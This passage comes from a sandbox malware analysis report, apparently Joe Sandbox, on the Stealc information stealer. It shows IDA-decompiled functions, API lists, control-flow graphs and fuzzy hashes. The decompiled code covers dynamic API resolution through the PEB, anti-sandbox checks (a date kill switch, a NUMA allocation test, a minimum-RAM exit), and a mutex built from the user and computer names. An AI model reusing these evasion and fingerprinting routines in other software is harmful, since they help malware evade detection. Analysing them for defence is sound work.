              				struct HINSTANCE__* _t15;
              				struct HINSTANCE__* _t17;
              				struct HINSTANCE__* _t19;
              				struct HINSTANCE__* _t20;
              				struct HINSTANCE__* _t21;
              				struct HINSTANCE__* _t22;
              				struct HINSTANCE__* _t23;
              				_Unknown_base(*)()* _t24;
              				intOrPtr* _t30;
              				struct HINSTANCE__* _t54;
              
              				_push(__ecx);
              				_v8 = _v8 & 0x00000000;
              				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
              				_t54 = _v8;
              				 *0x383768 = _t54;
              				if(_t54 != 0) {
              					_t30 = E0017DCF5(__ecx);
              					 *0x3836b0 = _t30;
              					 *0x3835e8 =  *_t30(_t54,  *0x383150);
              					 *0x383730 = GetProcAddress( *0x383768,  *0x3834d0);
              					 *0x3835dc = GetProcAddress( *0x383768,  *0x383534);
              					 *0x383724 = GetProcAddress( *0x383768,  *0x3831a8);
              					 *0x383604 = GetProcAddress( *0x383768,  *0x383194);
              					 *0x3835e4 = GetProcAddress( *0x383768,  *0x383234);
              					 *0x38376c = GetProcAddress( *0x383768,  *0x3833ec);
              					 *0x383758 = GetProcAddress( *0x383768,  *0x383278);
              					 *0x38363c = GetProcAddress( *0x383768,  *0x3834b8);
              					 *0x38364c = GetProcAddress( *0x383768,  *0x38345c);
              					 *0x3836ec = GetProcAddress( *0x383768,  *0x3832ec);
              					 *0x383720 = GetProcAddress( *0x383768,  *0x383228);
              					 *0x383714 = GetProcAddress( *0x383768,  *0x383500);
              					 *0x3837b8 = GetProcAddress( *0x383768,  *0x383018);
              					 *0x38377c = GetProcAddress( *0x383768,  *0x3834b0);
              					 *0x383794 = GetProcAddress( *0x383768,  *0x38316c);
              					 *0x383658 = GetProcAddress( *0x383768,  *0x383344);
              					 *0x3836bc = GetProcAddress( *0x383768,  *0x383524);
              					 *0x3837bc = GetProcAddress( *0x383768,  *0x383024);
              					 *0x3836dc = GetProcAddress( *0x383768,  *0x383080);
              					 *0x3836e4 = GetProcAddress( *0x383768,  *0x3831f4);
              				}
              				_t14 = LoadLibraryA( *0x383464); // executed
              				 *0x3835b8 = _t14; // executed
              				_t15 = LoadLibraryA( *0x3830cc); // executed
              				 *0x3836c0 = _t15;
              				 *0x38379c = LoadLibraryA( *0x383058); // executed
              				_t17 = LoadLibraryA( *0x38312c); // executed
              				 *0x38367c = _t17;
              				 *0x3836a4 = LoadLibraryA( *0x383264);
              				_t19 =  *0x3835b8; // 0x76170000
              				if(_t19 != 0) {
              					 *0x383688 = GetProcAddress(_t19,  *0x3833cc);
              				}
              				_t20 =  *0x3836c0; // 0x76130000
              				if(_t20 != 0) {
              					 *0x3836f4 = GetProcAddress(_t20,  *0x383350);
              					 *0x3836a0 = GetProcAddress( *0x3836c0,  *0x38311c);
              				}
              				_t21 =  *0x38379c; // 0x762b0000
              				if(_t21 != 0) {
              					 *0x383734 = GetProcAddress(_t21,  *0x3832cc);
              				}
              				_t22 =  *0x38367c; // 0x76b00000
              				if(_t22 != 0) {
              					 *0x383700 = GetProcAddress(_t22,  *0x38307c);
              				}
              				_t23 =  *0x3836a4; // 0x77090000
              				if(_t23 != 0) {
              					_t24 = GetProcAddress(_t23,  *0x383340);
              					 *0x38375c = _t24;
              					return _t24;
              				}
              				return _t23;
              			}















              0x0017dd87
              0x0017dd88
              0x0017dda0
              0x0017dda3
              0x0017dda6
              0x0017ddae
              0x0017ddb4
              0x0017ddbf
              0x0017ddcd
              0x0017dde4
              0x0017ddfb
              0x0017de12
              0x0017de29
              0x0017de40
              0x0017de57
              0x0017de6e
              0x0017de85
              0x0017de9c
              0x0017deb3
              0x0017deca
              0x0017dee1
              0x0017def8
              0x0017df0f
              0x0017df26
              0x0017df3d
              0x0017df54
              0x0017df6b
              0x0017df82
              0x0017df93
              0x0017df93
              0x0017df9e
              0x0017dfaa
              0x0017dfaf
              0x0017dfbb
              0x0017dfcc
              0x0017dfd1
              0x0017dfdd
              0x0017dfe8
              0x0017dfed
              0x0017dff5
              0x0017e004
              0x0017e004
              0x0017e009
              0x0017e010
              0x0017e025
              0x0017e036
              0x0017e036
              0x0017e03b
              0x0017e042
              0x0017e051
              0x0017e051
              0x0017e056
              0x0017e05d
              0x0017e06c
              0x0017e06c
              0x0017e071
              0x0017e078
              0x0017e081
              0x0017e087
              0x00000000
              0x0017e087
              0x0017e08d

              APIs
              • GetProcAddress.KERNEL32 ref: 0017DDD8
              • GetProcAddress.KERNEL32 ref: 0017DDEF
              • GetProcAddress.KERNEL32 ref: 0017DE06
              • GetProcAddress.KERNEL32 ref: 0017DE1D
              • GetProcAddress.KERNEL32 ref: 0017DE34
              • GetProcAddress.KERNEL32 ref: 0017DE4B
              • GetProcAddress.KERNEL32 ref: 0017DE62
              • GetProcAddress.KERNEL32 ref: 0017DE79
              • GetProcAddress.KERNEL32 ref: 0017DE90
              • GetProcAddress.KERNEL32 ref: 0017DEA7
              • GetProcAddress.KERNEL32 ref: 0017DEBE
              • GetProcAddress.KERNEL32 ref: 0017DED5
              • GetProcAddress.KERNEL32 ref: 0017DEEC
              • GetProcAddress.KERNEL32 ref: 0017DF03
              • GetProcAddress.KERNEL32 ref: 0017DF1A
              • GetProcAddress.KERNEL32 ref: 0017DF31
              • GetProcAddress.KERNEL32 ref: 0017DF48
              • GetProcAddress.KERNEL32 ref: 0017DF5F
              • GetProcAddress.KERNEL32 ref: 0017DF76
              • GetProcAddress.KERNEL32 ref: 0017DF8D
              • LoadLibraryA.KERNELBASE(?,?,?,0017CFA6), ref: 0017DF9E
              • LoadLibraryA.KERNELBASE(?,?,?,0017CFA6), ref: 0017DFAF
              • LoadLibraryA.KERNEL32(?,?,?,0017CFA6), ref: 0017DFC0
              • LoadLibraryA.KERNELBASE(?,?,?,0017CFA6), ref: 0017DFD1
              • LoadLibraryA.KERNEL32(?,?,?,0017CFA6), ref: 0017DFE2
              • GetProcAddress.KERNEL32(76170000), ref: 0017DFFE
              • GetProcAddress.KERNEL32(76130000), ref: 0017E019
              • GetProcAddress.KERNEL32 ref: 0017E030
              • GetProcAddress.KERNEL32(762B0000), ref: 0017E04B
              • GetProcAddress.KERNEL32(76B00000), ref: 0017E066
              • GetProcAddress.KERNEL32(77090000), ref: 0017E081
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad
              • String ID:
              • API String ID: 2238633743-0
              • Opcode ID: 9f2be59a9821026dc398929a53c72275b06c283dff97f49eb16163e8843405df
              • Instruction ID: fe385aa6feccf698f1cb877fddd1bd9490a8e252c691d1d6d3db4959128c92c8
              • Opcode Fuzzy Hash: 9f2be59a9821026dc398929a53c72275b06c283dff97f49eb16163e8843405df
              • Instruction Fuzzy Hash: 2681D2B5941340BFEB039F69ED989257FAEFB09F01B0451A9E90592330E7328A65EF10
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 180 17ceca-17cf6e GetSystemTime call 17cdfb sscanf call 171839 SystemTimeToFileTime * 2 185 17cf84-17cf88 180->185 186 17cf70 180->186 187 17cf72-17cf7a 186->187 188 17cf7c-17cf7e ExitProcess 186->188 187->185 187->188
              C-Code - Quality: 56%
              			E0017CECA() {
              				void* _v18;
              				struct _SYSTEMTIME _v20;
              				struct _SYSTEMTIME _v36;
              				char _v48;
              				struct _FILETIME _v60;
              				struct _FILETIME _v68;
              				void* __edi;
              				long _t39;
              				void* _t54;
              
              				_v20.wYear = 0;
              				_v68.dwLowDateTime = _v68.dwLowDateTime & 0x00000000;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosw");
              				_v36.wYear = 0;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosw");
              				_v60.dwLowDateTime = _v60.dwLowDateTime & 0;
              				asm("stosd");
              				asm("stosd");
              				GetSystemTime( &_v20);
              				sscanf( *(E0017CDFB( &_v48)),  *0x383330,  &(_v36.wDay),  &(_v36.wMonth),  &_v36);
              				E00171839(_v48);
              				SystemTimeToFileTime( &_v20,  &_v68);
              				SystemTimeToFileTime( &_v36,  &_v60);
              				_t39 = _v68.dwHighDateTime;
              				_t54 = _t39 - _v60.dwHighDateTime;
              				if(_t54 >= 0) {
              					if(_t54 > 0) {
              						L3:
              						ExitProcess(0); // executed
              					}
              					_t39 = _v68.dwLowDateTime;
              					if(_t39 > _v60.dwLowDateTime) {
              						goto L3;
              					}
              				}
              				return _t39;
              			}












              0x0017ced6
              0x0017cedb
              0x0017cee4
              0x0017cee5
              0x0017cee6
              0x0017cee7
              0x0017ceeb
              0x0017cef4
              0x0017cef5
              0x0017cef6
              0x0017cef7
              0x0017cefb
              0x0017cf03
              0x0017cf08
              0x0017cf0e
              0x0017cf34
              0x0017cf41
              0x0017cf50
              0x0017cf60
              0x0017cf66
              0x0017cf6a
              0x0017cf6e
              0x0017cf70
              0x0017cf7c
              0x0017cf7e
              0x0017cf7e
              0x0017cf72
              0x0017cf7a
              0x00000000
              0x00000000
              0x0017cf7a
              0x0017cf88

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Time$System$File$ExitProcesssscanf
              • String ID:
              • API String ID: 2533653975-0
              • Opcode ID: 22389b14c52b972b17c494ebceb31477da1997033b080408f44192d259f56156
              • Instruction ID: a1bd5dcd7d4c0e5230f5d80d863c0319d4b83dbb984e4b9e3497b0b234974a1e
              • Opcode Fuzzy Hash: 22389b14c52b972b17c494ebceb31477da1997033b080408f44192d259f56156
              • Instruction Fuzzy Hash: 7A211A72018341BFD341DBA8D84599BB7F9BF88714F404E2DF599D2160E730E6088B93
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 199 17d193-17d1c4 GetProcessHeap RtlAllocateHeap GetUserNameA
              C-Code - Quality: 100%
              			E0017D193(void* __ecx) {
              				long _v8;
              				CHAR* _t10;
              
              				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				_v8 = 0x104;
              				GetUserNameA(_t10,  &_v8); // executed
              				return _t10;
              			}





              0x0017d1ac
              0x0017d1b3
              0x0017d1ba
              0x0017d1c4

              APIs
              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001710AA,0017CFE5,0017FBD9), ref: 0017D19F
              • RtlAllocateHeap.NTDLL(00000000), ref: 0017D1A6
              • GetUserNameA.ADVAPI32(00000000,?), ref: 0017D1BA
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Heap$AllocateNameProcessUser
              • String ID:
              • API String ID: 1296208442-0
              • Opcode ID: d1b877a6483166fcbcb82f813b020b381b4560b9081712e254f2a8579433326b
              • Instruction ID: 156cad130e7a8ff7c98eeec7aa26d7f60aec48a6c646ecf7e979893480d92cf1
              • Opcode Fuzzy Hash: d1b877a6483166fcbcb82f813b020b381b4560b9081712e254f2a8579433326b
              • Instruction Fuzzy Hash: CED09BF5604304BBD70157A5DC4DE9A77BCD789B55F100195F602D2350E6F0DA448771
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 101 17cf89-17cf92 102 17cf97-17cf9c call 17190f 101->102 103 17cf94 101->103 107 17cfa1-17cfb3 call 17dd84 call 17e990 102->107 108 17cf9e 102->108 103->102 104 17cf96 103->104 104->102 114 17cfb5 107->114 115 17cfb8-17cfbd call 171010 107->115 108->107 109 17cf9f-17cfa0 108->109 109->107 114->115 116 17cfb6-17cfb7 114->116 119 17cfc2-17cfc7 call 1710c1 115->119 120 17cfbf 115->120 116->115 124 17cfcc-17cfd1 call 1710fd 119->124 125 17cfc9 119->125 120->119 121 17cfc0-17cfc1 120->121 121->119 129 17cfd6-17cfdb call 17cdd0 124->129 130 17cfd3 124->130 125->124 126 17cfca-17cfcb 125->126 126->124 134 17cfe0-17d063 call 171091 call 17d193 call 17d1c5 call 17eaab * 5 call 17ea2f call 171839 * 5 129->134 135 17cfdd 129->135 130->129 131 17cfd4-17cfd5 130->131 131->129 166 17d077-17d082 OpenEventA 134->166 135->134 136 17cfde-17cfdf 135->136 136->134 167 17d065-17d071 CloseHandle Sleep 166->167 168 17d084-17d090 CreateEventA 166->168 167->166 169 17d095-17d09a call 17ceca 168->169 170 17d092 168->170 174 17d09f-17d0ac call 17c73d CloseHandle ExitProcess 169->174 175 17d09c 169->175 170->169 171 17d094 170->171 171->169 175->174 176 17d09d-17d09e 175->176 176->174
              C-Code - Quality: 100%
              			_entry_() {
              				CHAR* _v16;
              				char _v28;
              				char _v40;
              				char _v52;
              				char _v64;
              				char _v76;
              				void* _t23;
              				void* _t24;
              				void* _t42;
              				CHAR* _t57;
              				void* _t58;
              				void* _t59;
              				void* _t70;
              				void* _t71;
              				void* _t72;
              
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E0017190F(_t58);
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E0017DD84(_t58); // executed
              				E0017E990( &_v16, _t71, 0x17fbd9);
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E00171010(_t58); // executed
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E001710C1();
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E001710FD(); // executed
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E0017CDD0();
              				if(_t71 != 0 && _t71 == 0) {
              				}
              				E00171091(); // executed
              				_t23 = E0017D193(_t58); // executed
              				_t62 = "_";
              				_t24 = E0017D1C5(_t58);
              				E0017EA2F(E0017EAAB(E0017EAAB(E0017EAAB(E0017EAAB(E0017EAAB( &_v16, _t58,  &_v76, _t71,  *0x383454), _t58,  &_v64, _t71, "_"), _t58,  &_v52, _t71, _t24), _t58,  &_v40, _t71, _t62), _t58,  &_v28, _t71, _t23), _t58,  &_v16);
              				E00171839(_v28);
              				E00171839(_v40);
              				E00171839(_v52);
              				E00171839(_v64);
              				E00171839(_v76);
              				_t57 = _v16;
              				while(1) {
              					_t42 = OpenEventA(0x1f0003, 0, _t57);
              					_t72 = _t42;
              					if(_t72 == 0) {
              						break;
              					}
              					CloseHandle(_t42);
              					Sleep(0x1770);
              				}
              				_t70 = CreateEventA(0, 0, 0, _t57);
              				if(_t72 != 0 && _t72 == 0) {
              				}
              				E0017CECA(); // executed
              				if(_t72 != 0 && _t72 == 0) {
              				}
              				E0017C73D(_t58, _t59, _t72);
              				CloseHandle(_t70);
              				ExitProcess(0);
              			}


















              0x0017cf92
              0x0017cf92
              0x0017cf97
              0x0017cf9c
              0x0017cf9c
              0x0017cfa1
              0x0017cfae
              0x0017cfb3
              0x0017cfb3
              0x0017cfb8
              0x0017cfbd
              0x0017cfbd
              0x0017cfc2
              0x0017cfc7
              0x0017cfc7
              0x0017cfcc
              0x0017cfd1
              0x0017cfd1
              0x0017cfd6
              0x0017cfdb
              0x0017cfdb
              0x0017cfe0
              0x0017cfe5
              0x0017cfeb
              0x0017cff1
              0x0017d02c
              0x0017d034
              0x0017d03c
              0x0017d044
              0x0017d04c
              0x0017d054
              0x0017d059
              0x0017d077
              0x0017d07a
              0x0017d080
              0x0017d082
              0x00000000
              0x00000000
              0x0017d066
              0x0017d071
              0x0017d071
              0x0017d08e
              0x0017d090
              0x0017d090
              0x0017d095
              0x0017d09a
              0x0017d09a
              0x0017d09f
              0x0017d0a5
              0x0017d0ac

              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9194ba073693bf59a9659f0b5d61a593b0f13a12a7cf9f17c11c7c758ec17e2
              • Instruction ID: fbaf3b888eb6f1883e99beeb2eb2522923a7ba59d4405eeee1a59f4d9ac9616b
              • Opcode Fuzzy Hash: f9194ba073693bf59a9659f0b5d61a593b0f13a12a7cf9f17c11c7c758ec17e2
              • Instruction Fuzzy Hash: A1416631D00214BFCB21BBBDDC4ACADBBF9AF64710B148499F40CA7172DB205E428BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 189 171010-171037 GetCurrentProcess VirtualAllocExNuma 190 171040-171057 VirtualAlloc 189->190 191 171039-17103a ExitProcess 189->191 192 17105e-171065 190->192 193 171059-17105c 190->193 194 171067-171086 VirtualFree 192->194 195 17108c-171090 192->195 193->192 194->195
              C-Code - Quality: 32%
              			E00171010(void* __ecx) {
              				void* _v8;
              				void* _t7;
              				void* _t8;
              				int _t10;
              				void* _t13;
              				void* _t19;
              				void* _t24;
              
              				_t7 =  *0x383758(GetCurrentProcess(), 0, 0x7d0, 0x3000, 0x40, 0, _t19, _t24, _t13, __ecx); // executed
              				if(_t7 == 0) {
              					ExitProcess(0);
              				}
              				_t8 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
              				_v8 = _t8;
              				_push(_t8);
              				if(_t8 != 0x11) {
              					asm("cld");
              				}
              				asm("clc");
              				_pop(_t10);
              				if(_v8 != 0) {
              					memset(_v8, 0, 0x5e69ec0 << 0);
              					_push(_t13);
              					asm("cld");
              					_t10 = VirtualFree(_v8, 0x17c841c0, 0x8000);
              				}
              				return _t10;
              			}










              0x0017102f
              0x00171037
              0x0017103a
              0x0017103a
              0x0017104a
              0x00171050
              0x00171053
              0x00171057
              0x0017105b
              0x0017105c
              0x00171060
              0x00171061
              0x00171065
              0x00171074
              0x00171076
              0x0017107b
              0x00171086
              0x00171086
              0x00171090

              APIs
              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,?,?,?,0017CFBD,0017FBD9), ref: 00171028
              • VirtualAllocExNuma.KERNELBASE(00000000,?,?,?,?,?,0017CFBD,0017FBD9), ref: 0017102F
              • ExitProcess.KERNEL32 ref: 0017103A
              • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,?,?,0017CFBD,0017FBD9), ref: 0017104A
              • VirtualFree.KERNEL32(?,17C841C0,00008000,?,?,?,?,?,0017CFBD,0017FBD9), ref: 00171086
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
              • String ID:
              • API String ID: 3477276466-0
              • Opcode ID: 1f10587236ab29860dda2adc8542ca16c538f630ee51b1ef24b418493b6cfdf1
              • Instruction ID: c3f44192d63e2db7d64d129756df411775838b011544c290c84b30c128b412a4
              • Opcode Fuzzy Hash: 1f10587236ab29860dda2adc8542ca16c538f630ee51b1ef24b418493b6cfdf1
              • Instruction Fuzzy Hash: 0001A7B2601214BBE71157699C8DFABBBBCEB86B51F204055F505E3350D6359E00D7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 196 17d1c5-17d1f9 GetProcessHeap RtlAllocateHeap GetComputerNameA 197 17d1fd-17d1ff 196->197 198 17d1fb 196->198 198->197
              C-Code - Quality: 100%
              			E0017D1C5(void* __ecx) {
              				long _v8;
              				int _t6;
              				CHAR* _t7;
              				CHAR* _t10;
              
              				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				_v8 = 0x104;
              				_t6 = GetComputerNameA(_t10,  &_v8); // executed
              				_t7 = 0x17fbd9;
              				if(_t6 != 0) {
              					_t7 = _t10;
              				}
              				return _t7;
              			}







              0x0017d1de
              0x0017d1e5
              0x0017d1ec
              0x0017d1f4
              0x0017d1f9
              0x0017d1fb
              0x0017d1fb
              0x0017d1ff

              APIs
              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00171096,0017CFE5,0017FBD9), ref: 0017D1D1
              • RtlAllocateHeap.NTDLL(00000000), ref: 0017D1D8
              • GetComputerNameA.KERNEL32(00000000,?), ref: 0017D1EC
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Heap$AllocateComputerNameProcess
              • String ID:
              • API String ID: 1664310425-0
              • Opcode ID: df8a9f6128ca364c18f4b7e75b77b8be064f31b266389f4f7e9c76a1ffca3f36
              • Instruction ID: a1f75ad1273b4632a87177ade1faa74bc57b9938824f76b0d11ecd780c997d79
              • Opcode Fuzzy Hash: df8a9f6128ca364c18f4b7e75b77b8be064f31b266389f4f7e9c76a1ffca3f36
              • Instruction Fuzzy Hash: 11E0ECF6300308ABE7119BB9DD4DA9A76BCEB88B55F0440A5B606D2290D6B0DA018731
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 200 1710fd-17110a 201 17110b-171116 200->201 203 171118-171129 GlobalMemoryStatusEx 201->203 204 17113c-17113e 203->204 205 17112b-17113a 203->205 206 171140-171142 204->206 205->206 207 171156-171159 206->207 208 171144 206->208 209 171146-17114c 208->209 210 17114e-171150 ExitProcess 208->210 209->207 209->210
              C-Code - Quality: 100%
              			E001710FD() {
              				unsigned int _v60;
              				signed int _v64;
              				intOrPtr _v68;
              				unsigned int _t7;
              				struct _MEMORYSTATUSEX* _t8;
              				unsigned int _t9;
              				unsigned int _t10;
              				intOrPtr _t11;
              				signed int _t12;
              				signed int _t14;
              				struct _MEMORYSTATUSEX* _t16;
              				unsigned int _t21;
              
              				_t16 = (_t14 & 0xfffffff8) - 0x40;
              				_t7 = 0;
              				_t11 = 0x40;
              				do {
              					 *((char*)(_t16 + _t7)) = 0;
              					if (_t7 != 0) goto L2;
              					_t7 = _t7 + 1;
              				} while (_t7 < _t11);
              				_t8 = _t16;
              				_v68 = _t11;
              				GlobalMemoryStatusEx(_t8); // executed
              				if(_t8 != 1) {
              					_t12 = 0;
              					_t9 = 0;
              				} else {
              					_t10 = _v60;
              					_t12 = (_t10 << 0x00000020 | _v64) >> 0x14;
              					_t9 = _t10 >> 0x14;
              				}
              				_t21 = _t9;
              				if(_t21 <= 0 && (_t21 < 0 || _t12 < 0x457)) {
              					ExitProcess(0);
              				}
              				return _t9;
              			}















              0x00171103
              0x00171108
              0x0017110a
              0x0017110b
              0x0017110b
              0x00171111
              0x00171113
              0x00171114
              0x00171118
              0x0017111c
              0x00171120
              0x00171129
              0x0017113c
              0x0017113e
              0x0017112b
              0x0017112b
              0x00171133
              0x00171137
              0x00171137
              0x00171140
              0x00171142
              0x00171150
              0x00171150
              0x00171159

              APIs
              • GlobalMemoryStatusEx.KERNELBASE(00000001,?,?,?,?,?,?,?,?,?,?,?,0017CFD1,0017FBD9), ref: 00171120
              • ExitProcess.KERNEL32 ref: 00171150
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: ExitGlobalMemoryProcessStatus
              • String ID:
              • API String ID: 803317263-0
              • Opcode ID: 75057a7245272744d7017cbf545540164242f31c676ffe85c7dc875dd9a40e7e
              • Instruction ID: e50939637fee94b66e5d5ae3dc5656f8a00e2696aaef9bb6a7c1bfb00814f71c
              • Opcode Fuzzy Hash: 75057a7245272744d7017cbf545540164242f31c676ffe85c7dc875dd9a40e7e
              • Instruction Fuzzy Hash: 7CF0B4706183056BE7249A7C9C55329B3F8D700711F90C92EEB5EC53C0EB70C500C25A
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 211 173083-1730a0 call 17d781 214 1730a6-1730f7 malloc call 17186d malloc call 172f36 211->214 215 1730a2-1730a4 211->215 215->214
              C-Code - Quality: 100%
              			E00173083(intOrPtr _a4) {
              				char _v8;
              				char _v12;
              				void* _v16;
              				signed int _t20;
              				signed int _t22;
              				signed int _t38;
              				signed int _t39;
              				signed int _t45;
              
              				_t20 = E0017D781(_a4);
              				_t49 = _t20;
              				_t38 = 3;
              				_t45 = _t20 % _t38;
              				_t22 = _t20;
              				if(_t45 != 0) {
              					_t22 = _t22 - _t45 + _t38;
              				}
              				_t39 = 6;
              				_v8 = malloc((_t22 << 3) / _t39 + 1);
              				E0017186D(_a4, _t26, _t49);
              				_v12 = malloc(4);
              				E00172F36(_v8,  &_v12); // executed
              				_v16 =  &_v8;
              				memset(_v16, 0, 4 << 0);
              				return _v12;
              			}











              0x0017308e
              0x00173097
              0x00173099
              0x0017309a
              0x0017309c
              0x001730a0
              0x001730a4
              0x001730a4
              0x001730ad
              0x001730c1
              0x001730c4
              0x001730cd
              0x001730d7
              0x001730e2
              0x001730ef
              0x001730f7

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: malloc
              • String ID:
              • API String ID: 2803490479-0
              • Opcode ID: 30dba3b85b8bd1316caff23512ff9e9c7f0fcea2d0b1f187321343b4205a99bc
              • Instruction ID: 2099ddc63dea4ab34fc37e6fa46207d2077aa30aed18691814a49026ce8b03f9
              • Opcode Fuzzy Hash: 30dba3b85b8bd1316caff23512ff9e9c7f0fcea2d0b1f187321343b4205a99bc
